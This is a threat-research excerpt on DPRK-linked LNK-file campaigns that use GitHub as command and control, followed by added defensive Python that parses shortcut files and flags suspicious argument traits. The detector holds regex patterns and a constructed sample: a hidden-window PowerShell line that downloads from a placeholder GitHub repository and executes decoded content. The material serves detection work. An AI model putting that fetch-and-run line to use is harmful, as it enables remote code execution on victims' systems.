FortiGuard Labs Threat Research
DPRK-Related Campaigns with LNK and GitHub C2
How DPRK actors use LNK files and GitHub C2 to evade detection and maintain persistence
Affected Platforms: Microsoft Windows
Impacted Users: Microsoft Windows
Impact: Stolen data may be leveraged for follow-on attacks
Severity Level: High
FortiGuard Labs recently detected a series of LNK files targeting users in South Korea. These attacks use a multi-stage scripting process and leverage GitHub as Command and Control (C2) infrastructure to evade detection. The LNK files can be traced back to 2024; the earlier versions had less obfuscation and retained significant metadata, which allowed us to track similar attacks spreading the XenoRAT malware.
In recent months, the threat actor has altered their tactics. They now embed decoding functions within LNK arguments and include encoded payloads directly inside the files. Based on the decoy PDF titles we collected, the attacker seems to be targeting various companies in Korea …
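As an added defender-side example (not code from the FortiGuard article or from the campaign), the following Python parses the COMMAND_LINE_ARGUMENTS field of a Shell Link (.lnk) file and flags argument strings that combine the traits described above: a decoding function embedded in the arguments, a GitHub raw/API URL, dynamic execution and a hidden window. The sample .lnk, the EXAMPLE-ORG/EXAMPLE-REPO URL and the trait patterns are constructed assumptions, not indicators taken from the report.

```python
import re
import struct
# Shell Link header constants (MS-SHLLINK); the sample .lnk built below is constructed.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGUMENTS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80

def build_lnk(args: str) -> bytes:  # minimal Unicode .lnk carrying only COMMAND_LINE_ARGUMENTS
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, HAS_ARGUMENTS | IS_UNICODE,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    return header + struct.pack("<H", len(args)) + args.encode("utf-16-le")

def lnk_arguments(data: bytes):  # returns COMMAND_LINE_ARGUMENTS, or None if absent
    if len(data) < 0x4C or data[:4] != b"L\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, pos = struct.unpack_from("<I", data, 20)[0], 0x4C
    if flags & HAS_IDLIST:    # LinkTargetIDList: uint16 size, then the items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:  # LinkInfo: uint32 total size at its start
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode, args = bool(flags & IS_UNICODE), None
    # StringData fields follow in this fixed order, each as uint16 char count + chars
    for flag in (HAS_NAME, HAS_RELPATH, HAS_WORKDIR, HAS_ARGUMENTS, HAS_ICON):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        size = count * 2 if unicode else count
        text = data[pos + 2:pos + 2 + size].decode("utf-16-le" if unicode else "cp1252")
        pos += 2 + size
        if flag == HAS_ARGUMENTS:
            args = text
    return args

# Traits from the campaign description: GitHub-hosted payload, decoder in the arguments,
# dynamic execution, hidden console window. Two or more together mark the file suspicious.
SUSPICIOUS = {
    "github_raw_or_api": r"raw\.githubusercontent\.com|api\.github\.com/repos",
    "inline_decoder": r"FromBase64String|-enc(odedcommand)?\b|\[char\]|-join",
    "dynamic_exec": r"\bIEX\b|Invoke-Expression",
    "hidden_window": r"-w(indowstyle)?\s+hidden",
}

def triage_lnk(data: bytes) -> dict:
    args = lnk_arguments(data) or ""
    hits = [name for name, pat in SUSPICIOUS.items() if re.search(pat, args, re.IGNORECASE)]
    return {"hits": hits, "suspicious": len(hits) >= 2}

# Constructed sample mimicking the described LNK arguments (placeholder repo, no real payload).
SAMPLE = build_lnk('-w hidden -c "$p=(iwr https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/'
                   'main/x).Content;IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($p)))"')
```

Run `triage_lnk` over the bytes of any shortcut file to list the traits it carries; a real triage would also hash the file and extract any appended payload after the StringData section.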
IoC